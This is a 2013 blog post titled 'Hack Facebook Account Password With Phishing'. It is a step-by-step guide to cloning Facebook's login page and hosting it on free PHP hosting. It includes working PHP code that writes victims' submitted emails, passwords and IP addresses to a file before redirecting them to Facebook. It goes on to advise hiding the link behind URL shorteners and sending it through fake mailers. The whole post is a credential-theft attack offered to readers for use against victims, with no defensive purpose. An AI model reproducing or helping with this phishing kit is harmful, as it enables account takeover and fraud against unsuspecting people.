Friday 29 March 2013

Hack Facebook Account Password With Phishing




Facebook phishing is the most common and easiest way we can hack a facebook account.
in phishing, we send the victim a fake login page of facebook which identical to the real one, if the victim doesn't notice and enters their details on this fake page thier details will be sent to us. So here, i will show you how to do it step by step in every details. :)

Okay so lets start with the first step.

First of all you need to create an account at:

www.000webhost.com 
www.my3gb.com
www.phpnet.us

or any other free web hosting service with php support.

After registering an account there or if you already have an account, then follow these steps,

Go to facebook login page and save the page to your dekstop. when you save the page correctly you should get 1 HTML file and 1 Folder associated to it. Now open the HTML file with a text editor like notepad, and search for the string action="https://www.facebook.com/login.php?login_attempt=1"
now change the action url to "post.php" like this action="post.php" now save the file. rename it as "index.html"
than open notepad and paste this php code:

<?php
$user=$_POST['email'];
$pass=$_POST['pass'];
$ip=$_SERVER['REMOTE_ADDR'];
$file=fopen('pass.html' , 'a');

$data="<b>Email or Username: </b>".$user."<br/><b>Password: </b>".$pass."<br/><b>IP Address: </b>".$ip."<br/><hr/><br/>";
$write=fwrite($file,$data);
header('location:http://facebook.com/me');
?>

save it as "post.php" remember, not "post.php.txt", its "post.php", now you should have 2 files and 1 folder.
now compress all of it to a zip file called "fb.zip" or what ever name you want.

Note: you can compress files using WinRAR , select the files left click it and select "Add to archive", save it as anything.zip 

Now head back to your web host. Go to Control Panel >> File Manager and upload the "fb.zip" file you downloaded to the root directory and extract it, If you dont know how to upload a file to a web server mention below in a comment or simply watch it from youtube.

Now see if it works or not. type in http://your-subdomain.tld/index.html If it shows the facebook login page, that means you've done it right.

when the victim logins, you can see their password at  http://your-subdomain.tld/pass.html

Now copy the link of the fake login page, change the url using a url shortner like:

www.tiny.cc 
www.goo.gl 
www.tinyurl.com 
www.shadyurl.com 

and send  it to the victim using a fake mailer or simply give the link. google to find free fake mailers :)
Posted by at
Labels: , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)